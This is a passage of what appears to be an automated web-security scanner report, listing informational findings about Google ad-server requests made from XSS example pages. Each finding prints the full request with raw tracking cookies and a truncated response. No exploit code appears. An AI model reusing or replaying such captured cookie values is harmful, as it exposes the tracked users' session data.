GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766864&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcwe-79-xss-dork-www.ovh.com.html&dt=1301748864014&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301748864027&frm=0&adk=1607234649&ga_vid=1820162902.1301748864&ga_sid=1301748864&ga_hid=1957583734&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=18&xpc=4y3R16wajz&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:47 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12595

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cwe-79-xss-dork-www.ovh.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saprunbetter.com%26adT%3DSAP:%2BRun%2BBetter%26adU%3Dwww.intacct.com/BuyersGuide%26adT%3DAccounting%2BSolution%2BGuide%26adU%3DQuickBooks.com%26adT%3DQuickBooks%25E2%2584%25A2%2B20%2525%2BDiscount%26gl%3DUS&amp;usg=AFQjCNG7QpgG_4S717VcZuY1qYm00bZm9A" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.10. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998814&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbloomberg.com.html&dt=1301749159639&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749159651&frm=0&adk=1607234649&ga_vid=1824435534.1301749160&ga_sid=1301749160&ga_hid=162966294&ga_fc=0&u_tz=-300&u_his=31&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895298&fu=0&ifi=1&dtd=16&xpc=S1mHzMfD9B&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:44 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14388

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/bloomberg.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DOptionsHouse.com%26adT%3DLearning%2BStock%2BTrading%26adU%3DoptionsXpress.com/FreeOptionsCoaching%26adT%3DCoaching%2Bon%2BStock%2BOptions%26adU%3DAmericanEnergyProperties.com%26adT%3DEarn%2Ba%2BMonthly%2BIncome%26gl%3DUS&amp;usg=AFQjCNGhRZfNEfKlrWfqHM3O-IO7kckkug" target=_blank><script>
...[SNIP]...
</script><img alt="Ads by Google" border=0 height=16 onload=tick('abg','_abg') src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script onload=tick('smajs','_smajs') src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.11. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767129&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-xss-dork-cwe79-imp.fetchback.com.html&dt=1301749129231&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301749129246&frm=0&adk=1607234649&ga_vid=1008383386.1301749129&ga_sid=1301749129&ga_hid=81316242&ga_fc=0&u_tz=-300&u_his=28&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=20&xpc=UwOBICQN6X&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:13 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12296

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-xss-dork-cwe79-imp.fetchback.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saprunbetter.com%26adT%3DSAP:%2BRun%2BBetter%26adU%3Dwww.opnet.com/network-diagram%26adT%3DNetwork%2BDiagram%2BTool%26adU%3Dwww.wincall.com%26adT%3DWinCall%2BCall%2BAccounting%26gl%3DUS&amp;usg=AFQjCNGKqkmNinpO1wokVjv08WJDdcPVVw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.12. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767200&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbody.aol.com.html&dt=1301749200784&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749200796&frm=0&adk=1607234649&ga_vid=1501998640.1301749201&ga_sid=1301749201&ga_hid=1970542589&ga_fc=0&u_tz=-300&u_his=34&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=17&xpc=nNGcw7qdmo&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:24 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12337

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/body.aol.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DFrontRange.com/Help-Desk-Software%26adT%3DHEAT%2BSoftware%26adU%3Dwww.saprunbetter.com%26adT%3DSAP:%2BRun%2BBetter%26adU%3Dwww.nimsoft.com/free-trial%26adT%3DNimsoft%2Bon%2BDemand%26gl%3DUS&amp;usg=AFQjCNENRhxyj3xcbnwkVFh_TRGsX8xE7w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.13. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766975&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcdn.nypost.com.html&dt=1301748975392&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748975404&frm=0&adk=1607234649&ga_vid=1056174654.1301748975&ga_sid=1301748975&ga_hid=528080557&ga_fc=0&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=UKIz1jjcy9&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:55:39 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12480

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cdn.nypost.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DFrontRange.com/Discovery%26adT%3DNetwork%2BDiscover%2BSoftware%26adU%3DColleges.CampusCorner.com%26adT%3DAccounting%2BColleges%26adU%3Dwww.accelops.net/DCMonitoring%26adT%3DNew%2BDataCenter%2BMonitoring%26gl%3DUS&amp;usg=AFQjCNHBUcb8OV4UTmdfliHwdxlll4f8ZQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.14. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:10 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12150

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cross-site-scripting-xss.www.courchevel.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.skinewgen.com%26adT%3DSki%2BSchool%2BCourchevel1850%26adU%3Dwww.chaletatlantique.com%26adT%3DChalet%2BAtlantique%26adU%3Dwww.altoedge.com/tapi-boards%26adT%3DCallURL%2B8%2BLine%2BTAPI%2BBoard%26gl%3DUS&amp;usg=AFQjCNGllpLNX1DCg2CeJS-cBvDIEzk8UQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.15. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767251&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbroadband.espn.go.com.html&dt=1301749251073&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301749251085&frm=0&adk=1607234649&ga_vid=1914141624.1301749251&ga_sid=1301749251&ga_hid=73962557&ga_fc=0&u_tz=-300&u_his=38&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=Pobz10SBRs&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:00:15 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4288

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/broadband.espn.go.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG45VgNSUgNuy2XmGsZn2WcvSkj-Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767179&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbluefly.com.html&dt=1301749179548&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749179559&frm=0&adk=1607234649&ga_vid=1639178297.1301749180&ga_sid=1301749180&ga_hid=1722711275&ga_fc=0&u_tz=-300&u_his=32&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=19&xpc=BKPUSVHPKn&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:03 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12108

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/bluefly.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DMastersinLaw.TJSL.edu%26adT%3DMaster%2Bof%2BLaws%2BDegree%26adU%3Dwww.Fishing-In-Saskatchewan.com%26adT%3DSaskatchewan%2BFishing%26adU%3Ddegree-online.NECB.edu%26adT%3DNECB%25C2%25AE%2BBBA%2Bin%2BAccounting%26gl%3DUS&amp;usg=AFQjCNFBkHATPQr0Pnc2x5t5am2na9osXw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.17. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998820&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapitalone.com.html&dt=1301748910317&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301748910348&frm=0&adk=1607234649&ga_vid=326627036.1301748910&ga_sid=1301748910&ga_hid=1851845152&ga_fc=0&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&fu=0&ifi=1&dtd=71&xpc=2Bd1PTEyBl&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
